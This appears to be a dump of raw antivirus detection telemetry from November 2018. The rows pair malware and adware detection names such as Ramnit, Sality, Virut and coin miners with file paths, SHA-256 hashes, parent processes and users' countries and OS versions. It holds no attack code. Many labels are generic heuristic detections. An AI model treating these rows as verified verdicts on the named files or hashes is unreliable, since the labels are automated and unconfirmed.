  Row(detection=Row(filename='3d5ec02ecb4fd63f5b804aacd3ded40da54ee436bff151da545de7216c5b67f0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3D5EC02ECB4FD63F5B804AACD3DED40DA54EE436BFF151DA545DE7216C5B67F0', filesize=1312000, name='TR/Crypt.XPACK.Gen.#M300.#R3904'), hash='3d5ec02ecb4fd63f5b804aacd3ded40da54ee436bff151da545de7216c5b67f0', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:00:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rome2.dll', filepath='C:\\Users\\X\\Desktop\\Total War Rome II Emperor Edition\\Rome2.dll', filesize=26752000, name='W32/Ramnit.CD.#M1.#R1'), hash='6e3e48dfcf4df4d9d268e8d8efb719f659d28431a00e22447bf0b51bcefbd8af', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-02T16:53:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered darom', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered darom', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='4b541787c8033f59b44a25777f2a2f4a3037447f688288976f253ea07a26f3e8', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160110-f4d54d97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160110-F4D54D97', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1254700\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc="C:\\Users\\X\\Downloads\\' PH Paulo Henrique - CD Promocional 2018_3573571827.exe", parentsize=2473080, timestamp='2018-11-02T18:56:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085734-4a08a846', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_92e9ac96\\AVSCAN-20181102-085704-4466B281\\AVSCAN-20181102-085734-4A08A846', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:57:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2014.exe', filepath='D:\\DOKUMENKU\\KOMPOSISI DANA\\2014\\2014.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninshs.exe', filepath='\\\\?\\C:\\Program Files\\KMSpico\\UninsHs.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='50baf9b5391ab32be32a66a06dc194fcbae5fb983c7df4d52c558651103a3fdb', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:13:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T03:15:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-190240-773a7c9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0d5ec04e\\AVSCAN-20181102-185412-19B88F55\\AVSCAN-20181102-190240-773A7C9A', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T02:00:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113100-5ab8e073', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-113005-558CD3C4\\AVSCAN-20181102-113100-5AB8E073', filesize=1088000, name='EXP/Excel.Exploit.Gen.#M1.#R1'), hash='46fca5e52395ecf0f3467a783e0bffb96a30de97377a885a87b67b367c7c014a', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:31:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084034-52c7165f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_208d8027\\AVSCAN-20181102-084022-50894259\\AVSCAN-20181102-084034-52C7165F', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:40:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ticogi.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4494210\\ticogi.exe', filesize=384000, name='HEUR/AGEN.1000017.#M1.#R1'), hash='25c83b8764939fdf7a368219bae83a90bacdde6f2df0642676d50658a0684afb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:27:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2debaae4c73958199395966de44cd51866ac16c04d51f57fabdf1faa81b1e314', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2DEBAAE4C73958199395966DE44CD51866AC16C04D51F57FABDF1FAA81B1E314', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2debaae4c73958199395966de44cd51866ac16c04d51f57fabdf1faa81b1e314', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:03:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rules_cw.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\Rules_CW\\Rules_CW.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='@rvind data2018.pif', filepath='D:\\@rvind data2018\\@rvind data2018.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='43fa6631f316912f69f3ac21abfb372d5d51c6cb971cf245ac9fa9e4a7364b4b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T10:03:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='15eb3c37d6bda8e312878d03029d29c179720763c0370ba35b782a29961cab24', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T13:22:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105512-42b7ed8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-105512-42B7ED8C', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:55:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.435\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.435\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T02:32:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa1176.45545\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa1176.45545\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T01:09:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053118-7ec1dca0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053118-7EC1DCA0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061439-8cb5fbe1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061439-8CB5FBE1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090218-7d98f4f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a95d6325\\AVSCAN-20181102-084022-64C18A0E\\AVSCAN-20181102-090218-7D98F4F7', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050710-1fcf30a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050710-1FCF30A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:24:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016 (1).exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016 (1).exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T11:17:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-215259-3581f290', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d1d9e4d6\\AVSCAN-20181102-214641-FAB0748F\\AVSCAN-20181102-215259-3581F290', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:53:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053201-97f640ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053201-97F640AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054709-b533ccab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054709-B533CCAB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135529-8023b02b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-135529-8023B02B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:58:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143427-327f1763', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-143427-327F1763', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050350-a82dceaa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050350-A82DCEAA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053248-b4749623', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053248-B4749623', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061405-78a9b8e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061405-78A9B8E4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152420-5e912277', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-152420-5E912277', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:27:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053115-7cccea18', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053115-7CCCEA18', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:14Z'), dt=datetime.date(2018, 11, 2)),
